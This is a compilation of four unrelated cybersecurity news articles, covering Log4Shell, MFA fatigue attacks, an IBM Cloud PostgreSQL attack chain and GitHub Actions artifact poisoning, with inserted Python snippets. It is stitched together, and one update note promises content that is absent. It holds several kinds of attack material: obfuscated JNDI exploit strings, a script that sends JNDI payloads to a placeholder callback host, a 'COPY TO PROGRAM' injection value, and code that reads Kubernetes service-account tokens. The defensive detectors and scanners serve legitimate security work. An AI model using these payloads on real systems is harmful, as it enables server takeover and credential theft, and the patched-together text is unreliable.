
Log4Shell Is Spawning Even Nastier Mutations


The cybersecurity Hiroshima of the year – the Apache Log4j logging library exploit – has spun off more than 60 bigger mutations in less than a day, researchers said.

The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.

Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by Sophos, Microsoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.

According to Microsoft researchers, beyond coin-miners, they’ve also seen installations of Cobalt Strike, which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.

Also, it could get a lot worse. Cybersecurity researchers at Check Point warned on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.

“Since Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,” they said.

The flaw, which is uber-easy to exploit, has been named Log4Shell. It’s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world’s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.
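The exploit string can arrive in any request field that an application eventually logs, which is what makes testing one's own exposure fairly straightforward. The following is a minimal sketch of such a self-test in Python; the target URL and callback domain are placeholders you would replace with an application you own and a callback host you control. It plants a unique, benign JNDI lookup string in a few commonly logged headers and relies on watching your own callback logs to see whether anything resolved it:

import uuid
import requests  # third-party library: pip install requests

# Placeholders -- point these at an application you own and a callback
# host you control (for example, a DNS-logging service). Never test
# systems you are not authorized to probe.
TARGET = "https://app.example.internal/login"
CALLBACK_DOMAIN = "log4shell-canary.example.net"

token = uuid.uuid4().hex[:12]
payload = f"${{jndi:ldap://{token}.{CALLBACK_DOMAIN}/a}}"

# Fields that back-end services commonly write to their logs.
headers = {
    "User-Agent": payload,
    "X-Forwarded-For": payload,
    "Referer": payload,
}

resp = requests.get(TARGET, headers=headers, timeout=10)
print(f"Probe {token} sent, HTTP {resp.status_code}. "
      f"Watch the logs for {CALLBACK_DOMAIN} to see whether the lookup fired.")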

Mutations May Enable Exploits to Slip Past Protections

On Monday, Check Point reported that Log4Shell’s new, malignant offspring can now be exploited “either over HTTP or HTTPS (the encrypted version of browsing).”

The more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. “It means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,” they wrote.

Because of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 Shellshock family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.

Tactical Shifts

Besides variations that can slip past protections, researchers are also seeing new tactics.

Luke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that the initial exploit attempts were basic callbacks coming from Tor nodes. They mostly pointed back to “bingsearchlib[.]com,” with the exploit being passed in the User-Agent header or the Uniform Resource Identifier (URI) of the request.

But since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there’s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.

“This originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,” Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JNDI) string itself, by taking advantage of other translation features of the JNDI process.

He offered these examples:

${jndi:${lower:l}${lower:d}a${lower:p}://world80
${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//
${jndi:dns://

…All of which achieve the same objective: “to download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,” Richards said.
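One practical consequence for defenders is that naive string matching on “${jndi:” misses the wrapped variants shown above. Below is a rough detection sketch in Python; the wrapper list is deliberately incomplete and purely illustrative, since production rules need to handle many more lookup types. It first collapses the ${lower:…} and ${env:…:-…} wrappers and only then checks for a JNDI lookup:

import re

# Collapse the lookup wrappers seen in the samples above. Real-world rules
# need to handle more lookup types (upper, date, sys, nested defaults, ...).
WRAPPERS = [
    (re.compile(r"\$\{lower:(.)\}", re.IGNORECASE), r"\1"),
    (re.compile(r"\$\{upper:(.)\}", re.IGNORECASE), r"\1"),
    (re.compile(r"\$\{env:[^:}]*:-(.)\}", re.IGNORECASE), r"\1"),
]

def looks_like_log4shell(field: str) -> bool:
    """Return True if a logged request field resembles a JNDI lookup payload."""
    normalized = field
    for _ in range(5):  # a few passes unwrap shallow nesting
        for pattern, replacement in WRAPPERS:
            normalized = pattern.sub(replacement, normalized)
    return "${jndi:" in normalized.lower()

samples = [
    "${jndi:${lower:l}${lower:d}a${lower:p}://world80",
    "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}"
    "${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//",
    "${jndi:dns://",
    "Mozilla/5.0 (an ordinary User-Agent)",
]
for sample in samples:
    print(looks_like_log4shell(sample), sample)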

Bug Has Been Targeted All Month

Attackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.

On Sunday, Sophos researchers said that they’d “already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,” noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.

“Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince tweeted on Saturday. “That suggests it was in the wild at least nine days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.”

On Sunday, Cisco Talos chimed in with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. “It is recommended that organizations expand their hunt for scanning and exploit activity to this date,” it advised.

Exploits Attempted on 40% of Corporate Networks

Check Point said on Monday that it’s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it’s seen more than 100 attempts to exploit the vulnerability per minute.

As of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.

The map below illustrates the top targeted geographies.

Top affected geographies. Source: Check Point.

Hyperbole isn’t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: “It wouldn’t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,” Dali noted via email on Monday. “Connecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren’t taken right away.”

As has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability “is relatively easy to exploit, and we’ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,” Dali reiterated. “Hopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.”

This situation is rapidly evolving, so keep an eye out for additional news. Below are some of the new protections and detection tools we’ve seen.

New Protections, Detection Tools

  • On Saturday, Huntress Labs released a tool – available here – to help organizations test whether their applications are vulnerable to CVE-2021-44228.
  • Cybereason released Logout4Shell, a “vaccine” for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.
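Separate from both tools above, many teams also swept hosts for vulnerable copies of the library itself. The sketch below is a minimal illustration of that idea, not a substitute for a real scanner: it walks a directory tree and flags log4j-core JARs whose filename version is below 2.15.0 (the first release with a fix for CVE-2021-44228), while ignoring shaded or renamed JARs that a thorough scan would also have to inspect:

import os
import re
import sys

JAR_RE = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$", re.IGNORECASE)
FIXED = (2, 15, 0)  # first release with the CVE-2021-44228 fix

def scan(root: str) -> None:
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            match = JAR_RE.search(name)
            if not match:
                continue
            version = tuple(int(part) for part in match.groups())
            verdict = "OK" if version >= FIXED else "VULNERABLE - update"
            print(f"{os.path.join(dirpath, name)}: {verdict}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")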

Growing List of Affected Manufacturers, Components

As of Monday, the internet was still in meltdown mode, with an ever-growing, crowd-sourced list hosted on GitHub that only scratches the surface of the millions of applications and manufacturers that use Log4j for logging. The list indicates whether they’re affected by Log4Shell and provides links to evidence if they are.

Spoiler alert: Most are.

A Deep Dive and Other Resources

  • Immersive Labs has posted a hands-on lab of the incident.
  • Lacework has published a blog post regarding how the news affects security best practices at the developer level.
  • NetSPI has published a blog post that includes details on Log4Shell’s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.

This is a developing story – stay tuned to Threatpost for ongoing coverage.

121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards.
121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.






Improving Cyber Hygiene with Multi-Factor Authentication and Cyber Awareness


Using multi-factor authentication (MFA) is one of the key components of an organization’s Identity and Access Management (IAM) program to maintain a strong cybersecurity posture. Having multiple layers to verify users is important, but MFA fatigue is also real and can be exploited by hackers.

Enabling MFA for all accounts is a best practice for all organizations, but the specifics of how it is implemented are significant because attackers are developing workarounds. That said, when done correctly – and with the right pieces in place – MFA is an invaluable tool in the cyber toolbox and a key piece of proper cyber hygiene. This is a primary reason why MFA was a key topic for this year’s Cybersecurity Awareness Month. For leaders and executives, the key is to ensure employees are trained to understand the importance of security tools like MFA while also keeping the process easy for them to use.

MFA is still an important piece of the cyber hygiene puzzle

Multi-factor authentication helps provide extra layers of security throughout your organization. This quick verification step lets organizations confirm a user’s identity before allowing access to company data. In practice, that can mean prompting employees to use mobile tokens or to enter a specific code sent by text or email before logging on to certain devices and websites.

MFA fatigue is rising, and hackers are noticing

Even though MFA should be a basic requirement these days, it’s not a foolproof tactic. Attackers are finding new ways around this security layer with what are called MFA fatigue attacks.

As employees try to access work applications, they are often prompted to verify their identity in some way established by the IT security team. This typically involves notifications to their smartphones. Anyone who has been trying to complete their work in a timely manner knows the irritation of constantly having to take action on these notifications. This is the basis of the MFA fatigue attack.

Attackers excel at finding ways to gain entry to their chosen target, and they seem to know a good bit about human psychology. Attackers who hold compromised credentials are now spamming those employees with MFA authorization requests – sometimes dozens of times in an hour – until the employees get so irritated that they approve the request in their authentication apps. Or they might assume there is a system malfunction and accept the notification just to make the prompts stop.

A simple, effective MFA strategy for long-term success

Getting MFA right is a balance: strict enough that the security measure keeps its integrity, yet lenient enough that employees don’t grow tired of it and get tripped up.

If sessions are invalidated too frequently, employees may grow irritated and see the MFA prompts as excessive. On the other hand, if policies are too lenient, authenticated sessions can last too long, IP changes won’t trigger new prompts, new MFA device enrollments won’t generate alerts, and enterprises run the risk of not being informed when, for instance, an authentication token that has already passed the MFA check gets stolen.

Most employees have never heard of MFA fatigue attacks, so they don’t know to look for or report them. To close that gap, organizations need to educate employees so they’re prepared to spot these attacks.

Organizations need to place controls on MFA to lower the potential for abuse. The most effective control is to avoid methods that allow simple approvals of notifications – a scenario that contributes to MFA fatigue. All approvals should require responses that prove the user has the authenticated device. Number matching, for instance, is a technique that requires the user to enter, in the authenticator app, a number displayed on the sign-in screen.

There’s also the effective one-time passcode (OTP) method of approval where the user gets information from the authentication request and has to enter it for verification. This requires a little more work on the user’s part, but it helps reduce the risk of MFA fatigue.
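As a concrete illustration of why these approaches blunt fatigue attacks, here is a generic sketch (not any particular vendor’s implementation): the sign-in screen displays a short challenge, and a push approval only counts if the user types that same value into the authenticator app, so a blind “approve” tap proves nothing:

import hmac
import secrets

def new_challenge() -> str:
    """Two-digit number displayed only on the sign-in screen."""
    return f"{secrets.randbelow(100):02d}"

def approve_push(challenge_shown: str, value_entered_in_app: str) -> bool:
    """Accept the approval only if the user proves they saw the sign-in screen."""
    # compare_digest avoids leaking the answer through timing differences.
    return hmac.compare_digest(challenge_shown, value_entered_in_app)

challenge = new_challenge()
print("Sign-in screen shows:", challenge)
print("Blind tap, nothing entered:", approve_push(challenge, ""))        # False
print("Matching number entered:  ", approve_push(challenge, challenge))  # True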

Another useful tool is an endpoint privilege management solution, which helps to stop the theft of cookies. If attackers get a hold of those cookies, they can bypass MFA controls. This solution is a robust layer in the protection of user credentials.

It’s important to set thresholds and send alerts to the SOC if certain thresholds are exceeded. The SOC can use user behavior analytics to create context-based triggers that alert the security team if any unusual behavior occurs. It can also prohibit user authentication from dubious IP addresses.
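A minimal sketch of the threshold idea (illustrative names and limits, not a specific product): count the push prompts each account receives inside a sliding window and notify the SOC once the count crosses a limit, since legitimate users rarely generate dozens of prompts in a few minutes:

import time
from collections import defaultdict, deque

WINDOW_SECONDS = 600    # 10-minute sliding window
ALERT_THRESHOLD = 10    # prompts per account before the SOC is notified

_recent_prompts = defaultdict(deque)  # username -> timestamps of recent prompts

def record_mfa_prompt(username: str, now=None) -> bool:
    """Record one push prompt; return True if the SOC should be alerted."""
    now = time.time() if now is None else now
    window = _recent_prompts[username]
    window.append(now)
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()
    return len(window) > ALERT_THRESHOLD

# Simulate an MFA fatigue burst against a single account.
for i in range(12):
    if record_mfa_prompt("j.doe", now=1_000_000 + i * 20):
        print(f"ALERT: {i + 1} prompts for j.doe in 10 minutes - possible MFA fatigue attack")
        break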

Outsmarting cyber criminals with the right security solutions and training

MFA prevents unauthorized access from cyber criminals, yet they have found a way to circumvent it by using its own premise of trust and authentication against users. That’s why organizations must use a two-pronged approach of educating employees about MFA fatigue attacks and setting up appropriate guardrails to reduce the likelihood of these attacks succeeding. Solutions like Fortinet’s FortiAuthenticator, FortiToken and FortiTrust Identity further protect organizations and strengthen their security posture. At the same time, cybersecurity awareness training, like Fortinet’s Security Awareness and Training service, can help ensure that employees are aware of all threat methods, as well as the importance of properly using all the security tools available to them.

Find out more about how Fortinet’s Training Advancement Agenda (TAA) and Training Institute programs—including the NSE Certification program, Academic Partner program, and Education Outreach program—are increasing access to training to help solve the cyber skills gap.

 





Researchers found security pitfalls in IBM’s cloud infrastructure


Security researchers recently probed IBM Cloud’s database-as-a-service infrastructure and found several security issues that granted them access to the internal server used to build database images for customer deployments. The demonstrated attack highlights some common security oversights that can lead to supply chain compromises in cloud infrastructure.

Developed by researchers from security firm Wiz, the attack combined a privilege escalation vulnerability in the IBM Cloud Databases for PostgreSQL service with plaintext credentials scattered around the environment and overly permissive internal network access controls that allowed for lateral movement inside the infrastructure.

PostgreSQL is an appealing target in cloud environments

Wiz’s audit of the IBM Cloud Databases for PostgreSQL service was part of a larger research project that analyzed PostgreSQL deployments across major cloud providers that offer this database engine as part of their managed database-as-a-service solutions. Earlier this year, the Wiz researchers also found and disclosed vulnerabilities in the PostgreSQL implementations of Microsoft Azure and the Google Cloud Platform (GCP).

The open-source PostgreSQL relational database engine has been in development for over 30 years with an emphasis on stability, high-availability and scalability. However, this complex piece of software was not designed with a permission model suitable for multi-tenant cloud environments where database instances need to be isolated from each other and from the underlying infrastructure.

PostgreSQL has powerful features through which administrators can alter the server file system and even execute code through database queries, but these operations are unsafe and need to be restricted in shared cloud environments. Meanwhile, other admin operations such as database replication, creating checkpoints, installing extensions and event triggers need to be available to customers for the service to be functional. That’s why cloud service providers (CSPs) had to come up with workarounds and make modifications to PostgreSQL’s permission model to enable these capabilities even when customers only operate with limited accounts.

Privilege escalation through SQL injection

While analyzing IBM Cloud’s PostgreSQL implementation, the Wiz researchers looked at the Logical Replication mechanism that’s available to users. This feature was implemented using several database functions, including one called create_subscription that is owned and executed by a database superuser called ibm.

When they inspected the code of this function, the researchers noticed an SQL injection vulnerability caused by improper sanitization of the arguments passed to it. This meant they could pass arbitrary SQL queries to the function, which would then execute those queries as the ibm superuser. The researchers exploited this flaw via the PostgreSQL COPY statement to execute arbitrary commands on the underlying virtual machine that hosted the database instance and opened a reverse shell.
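The underlying mistake (query text assembled from untrusted arguments instead of values bound as parameters) looks the same in any language. The sketch below uses the Python psycopg2 client purely as a stand-in to show the pattern; it is not IBM’s server-side code, and the table and column names are made up:

import psycopg2  # third-party PostgreSQL driver, used here only for illustration

conn = psycopg2.connect("dbname=demo user=app")  # placeholder connection string
cur = conn.cursor()

def find_subscription_unsafe(sub_name: str):
    # Anti-pattern: the argument is pasted into the SQL text, so input such as
    # "x'; COPY (SELECT '') TO PROGRAM 'id'; --" adds statements that run with
    # whatever privileges the executing role has.
    cur.execute(f"SELECT * FROM subscriptions WHERE name = '{sub_name}'")
    return cur.fetchall()

def find_subscription_safe(sub_name: str):
    # Parameter binding: the value is sent separately from the query text and
    # can never change the structure of the statement.
    cur.execute("SELECT * FROM subscriptions WHERE name = %s", (sub_name,))
    return cur.fetchall()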

With a shell on the Linux system, they started doing some reconnaissance to understand their environment: listing running processes, checking active network connections, inspecting the contents of the /etc/passwd file, which lists the system’s users, and running a port scan on the internal network to discover other servers. The broad port scan caught the attention of the IBM security team, who reached out to the Wiz team to ask about their activities.

“After discussing our work and sharing our thoughts with them, they kindly gave us permission to pursue our research and further challenge security boundaries, reflecting the organization’s healthy security culture,” the Wiz team said.

Stored credentials lead to supply chain attack

The gathered information, such as environment variables, told the researchers they were in a Kubernetes (K8s) pod container. After searching the file system, they found a K8s API access token stored locally in the file /var/run/secrets/kubernetes.io/serviceaccount/token. The API token allowed them to gather more information about the K8s cluster, but it turned out that all the pods were associated with their account and operated under the same namespace. This wasn’t a dead end, though.
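For readers unfamiliar with that file: every pod that has not opted out gets a service-account token mounted at that standard path, and it can be presented as a Bearer credential to the cluster’s internal API endpoint. The following is a minimal sketch of the kind of enumeration described above, run from inside a pod; the mount paths and endpoint are the Kubernetes defaults, and what the call actually returns depends entirely on the RBAC role bound to the service account:

import json
import ssl
import urllib.request

TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"
CA_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
NS_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"
API = "https://kubernetes.default.svc"

token = open(TOKEN_PATH).read().strip()
namespace = open(NS_PATH).read().strip()

context = ssl.create_default_context(cafile=CA_PATH)
request = urllib.request.Request(
    f"{API}/api/v1/namespaces/{namespace}/pods",
    headers={"Authorization": f"Bearer {token}"},
)

# Whether this lists anything at all is governed by the pod's RBAC bindings.
with urllib.request.urlopen(request, context=context) as response:
    for pod in json.load(response).get("items", []):
        print(pod["metadata"]["name"])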

K8s is a container orchestration system used for software deployment where containers are usually deployed from images — prebuilt packages that contain all the files needed for a container and its preconfigured services to operate. These images are normally stored on a container registry server, which can be public or private. In the case of IBM Cloud, it was a private container registry that required authentication.

The researchers used the API token to read the configurations of the pods in their namespace and found the access key for four different internal container registries in those configuration files. The description of this newly found key in IBM Cloud’s identity and access management (IAM) API suggested it had both read and write privileges to the container registries, which would have given the researchers the ability to overwrite existing images with rogue ones.

However, it turned out that the key description was inaccurate and they could only download images. This level of access had security implications, but it did not pose a direct threat to other IBM Cloud customers, so the researchers pushed forward.

Container images can contain a lot of sensitive information that’s used during deployment and later gets deleted, including source code, internal scripts referencing additional services in the infrastructure, as well as credentials needed to access them. Therefore, the researchers decided to download all images from the registry service and use an automated tool to scan them for secrets, such as credentials and API tokens.

“In order to comprehensively scan for secrets, we unpacked the images and examined the combination of files that made up each image,” the researchers said. “Container images are based on one or more layers; each may inadvertently include secrets. For example, if a secret exists in one layer but is deleted from the following layer, it would be completely invisible from within the container. Scanning each layer separately may therefore reveal additional secrets.”

The JSON manifest files of container images have a “history” section that lists historical commands that were executed during the build process of every image. In several such files, the researchers found commands that had passwords passed to them as command line arguments. These included passwords for an IBM Cloud internal FTP server and a build artifact repository.
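Here is a rough sketch of that kind of scan, run against an image exported with docker save in the classic layout; the secret patterns are deliberately simplistic and the layout handling ignores newer OCI-style exports. It checks the image config’s build history for credentials passed on command lines, then walks every file in every layer, since a file deleted in a later layer still exists in the earlier one:

import io
import json
import re
import sys
import tarfile

# Toy patterns; real secret scanners ship far richer rule sets.
SECRET_RE = re.compile(
    rb"(password|passwd|secret|api[_-]?key|token)\s*[=:]\s*\S+", re.IGNORECASE
)

def scan_saved_image(path: str) -> None:
    with tarfile.open(path) as image:
        manifest = json.load(image.extractfile("manifest.json"))[0]

        # 1. Build history: commands with credentials on the command line.
        config = json.load(image.extractfile(manifest["Config"]))
        for entry in config.get("history", []):
            command = entry.get("created_by", "")
            if SECRET_RE.search(command.encode()):
                print(f"[history] {command}")

        # 2. Every layer, scanned independently of the layers above it.
        for layer_name in manifest["Layers"]:
            layer_bytes = image.extractfile(layer_name).read()
            with tarfile.open(fileobj=io.BytesIO(layer_bytes)) as layer:
                for member in layer.getmembers():
                    if not member.isfile() or member.size > 1_000_000:
                        continue
                    if SECRET_RE.search(layer.extractfile(member).read()):
                        print(f"[{layer_name}] {member.name}")

if __name__ == "__main__":
    scan_saved_image(sys.argv[1])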

Finally, the researchers tested if they could access those servers from within their container and it turned out that they could. This overly permissive network access combined with the extracted credentials allowed them to overwrite arbitrary files in the build artifact repository that’s used by the automated IBM Cloud build process to create container images. Those images are then used in customer deployments, opening the door to a supply chain attack.

“Our research into IBM Cloud Databases for PostgreSQL reinforced what we learned from other cloud vendors, that modifications to the PostgreSQL engine effectively introduced new vulnerabilities to the service,” the researchers said. “These vulnerabilities could have been exploited by a malicious actor as part of an extensive exploit chain culminating in a supply-chain attack on the platform.”

Lessons for other organizations

While all of these issues have already been privately reported to and fixed by the IBM Cloud team, they are not unique to IBM. According to the Wiz team, the “scattered secrets” issue is common across all cloud environments.

Automated build and deployment workflows often leave secrets behind in various places – such as configuration files, Linux bash history and journal files – that developers forget to wipe when deployment is complete. Furthermore, some developers accidentally upload their whole .git directories and CircleCI configuration files to production servers. Forgotten secrets commonly found by the Wiz team include cloud access keys, passwords, CI/CD credentials and API access tokens.

Another prevalent issue that played a critical role in the IBM Cloud attack is the lack of strict access controls between production servers and internal CI/CD systems. This often allows attackers to move laterally and gain a deeper foothold into an organization’s infrastructure.

Finally, private container registries can provide a wealth of information to attackers that goes beyond credentials. They can reveal information about critical servers inside the infrastructure or can contain code that reveals additional vulnerabilities. Organizations should make sure their container registry solutions enforce proper access controls and scoping, the Wiz team said.





Software projects face supply chain security risk due to insecure artifact downloads via GitHub Actions


The way build artifacts are stored by the GitHub Actions platform could enable attackers to inject malicious code into software projects with CI/CD (continuous integration and continuous delivery) workflows that don’t perform sufficient filtering when downloading artifacts. Cybersecurity researchers have identified several popular artifact download scripts, used by thousands of repositories, that are vulnerable to this issue.

“We have discovered that when transferring artifacts between different workflows, there is a major risk for artifact poisoning — a technique in which attackers replace the content of a legitimate artifact with a modified malicious one and thereby initiate a supply chain attack,” researchers from supply chain security firm Legit Security said in an analysis of the issue.

To attack a vulnerable project’s CI/CD pipeline that downloads and uses artifacts generated by other workflows, attackers only need to fork the repositories containing those workflows, modify the workflows in their local copies so they produce rogue artifacts, and then open pull requests back to the original repositories – without those requests ever having to be accepted.

A logic flaw in artifact storage APIs

GitHub Actions is a CI/CD platform for automating the building and testing of software code. The service is free for public repositories and includes free minutes of worker run time and storage space for private repositories. It’s widely adopted by projects that use GitHub to host and manage their source code repositories.

GitHub Actions workflows are automated processes defined in .yml files using YAML syntax that get executed when certain triggers or events occur, such as when new code gets committed to the repository. Build artifacts are compiled binaries, logs and other files that result from the execution of a workflow and its individual jobs. These artifacts are saved inside storage buckets, with each workflow run assigned a particular bucket to which it can upload files and from which it can later download them.

The reference “action” (script) for downloading artifacts that’s provided by GitHub doesn’t support cross-workflow artifact downloads, but reusing artifacts generated by different workflows as input for follow-up build steps is a common use case for software projects. That’s why developers have created their own custom scripts that rely on the GitHub Actions API to download artifacts using more complex filtering, such as artifacts created by a specific workflow file, a specific user, a specific branch and so on.

The problem that Legit Security found is that the API doesn’t differentiate between artifacts uploaded by forked repositories and base repositories, so if a download script filters artifacts generated by a particular workflow file from a particular repository, the API will serve the latest version of the artifact generated by that file, but this could be a malicious version generated automatically via a pull request action from a forked version of the repository.

“To put it simply: in a vulnerable workflow, any GitHub user can create a fork that builds an artifact,” the researchers said. “Then inject this artifact into the original repository build process and modify its output. This is another form of a software supply chain attack, where the build output is modified by an attacker.”

The researchers found four custom actions developed by the community for downloading artifacts that were all vulnerable. One of them was listed as a dependency for over 12,000 repositories.

The Rust example

One of the repositories that used such a custom script in one of its workflows was the official repository for the Rust programming language. The vulnerable workflow, called ci.yml, was responsible for building and testing the repository’s code and used the custom action to download an artifact called libgccjit.so — a Linux library file — that was generated by a workflow in a third-party repository.

All attackers had to do was fork the third-party repository, modify the workflow from that repository to generate a malicious version of the library, and issue a pull request to the original repository to generate the artifact. If Rust’s workflow had then pulled in the poisoned version of the library, it would have given the attackers the ability to execute malicious code within the Rust repository with the workflow’s privileges.

“Upon exploitation, the attacker could modify the repository branches, pull requests, issues, releases, and all of the entities that are available for the workflow token permissions,” the researchers said.

Users need to enforce stricter filtering for artifact downloads

GitHub responded to Legit’s report by adding more filtering capabilities to the API which developers can use to better identify artifacts created by a specific run instance of the workflow (workflow run id). However, this change cannot be forced onto existing implementations without breaking workflows, so it’s up to users to update their workflows with stricter filtering in order to be protected.

Another mitigation is to filter the downloaded artifacts by the hash value of the commits that generated them, or to exclude artifacts created by pull requests entirely using the exclude_pull_requests option. Legit Security also contacted the authors of the vulnerable custom artifact download scripts they found.
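The following is a minimal sketch of what stricter filtering can look like against GitHub’s REST API for Actions; the repository, workflow file, commit and token below are placeholders. It lists only successful, non-pull-request runs of a named workflow, pins the run to a commit you actually trust, and only then asks for that specific run’s artifacts by run id:

import requests  # third-party library: pip install requests

OWNER, REPO = "example-org", "example-repo"   # placeholders
WORKFLOW_FILE = "build.yml"                   # workflow whose artifact we want
TRUSTED_SHA = "0123abcd"                      # prefix of a commit you reviewed
API = "https://api.github.com"
HEADERS = {
    "Authorization": "Bearer <token>",        # placeholder token
    "Accept": "application/vnd.github+json",
}

# 1. List runs of the workflow, excluding anything triggered by a pull request.
runs = requests.get(
    f"{API}/repos/{OWNER}/{REPO}/actions/workflows/{WORKFLOW_FILE}/runs",
    params={"branch": "main", "status": "success", "exclude_pull_requests": "true"},
    headers=HEADERS,
    timeout=30,
).json()["workflow_runs"]

# 2. Pin the run to a trusted commit instead of blindly taking the latest one.
run = next((r for r in runs if r["head_sha"].startswith(TRUSTED_SHA)), None)
if run is None:
    raise SystemExit("no successful non-PR run found for the trusted commit")

# 3. Fetch artifacts for that specific run id only.
artifacts = requests.get(
    f"{API}/repos/{OWNER}/{REPO}/actions/runs/{run['id']}/artifacts",
    headers=HEADERS,
    timeout=30,
).json()["artifacts"]

for artifact in artifacts:
    print(artifact["name"], artifact["archive_download_url"])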

“In supply chain security, the focus has been on preventing people from contributing malicious code, so every time you do a change in a repository, create a pull request or do a change request, GitHub has a lot of built-in verification controls,” Liav Caspi, CTO of Legit Security, tells CSO. “Somebody has to approve your code, somebody has to merge it, so there’s a person involved. What we’ve been trying to find are techniques that exploit a logic problem that any person could influence without review and I think this is one of them. If someone would have known about it, they could have injected the artifact without any approval.”

Typically, CI pipelines have workflows that run automatically on pull requests to test the code before it’s manually reviewed and if the pull request contains any artifact that needs to be built, the workflow will build it, Caspi said. A sophisticated attacker could create the pull request to get the artifact built and then delete the request by closing the submission and chances are with all the activity noise that exists in source code repositories today, it would go unnoticed, he said.



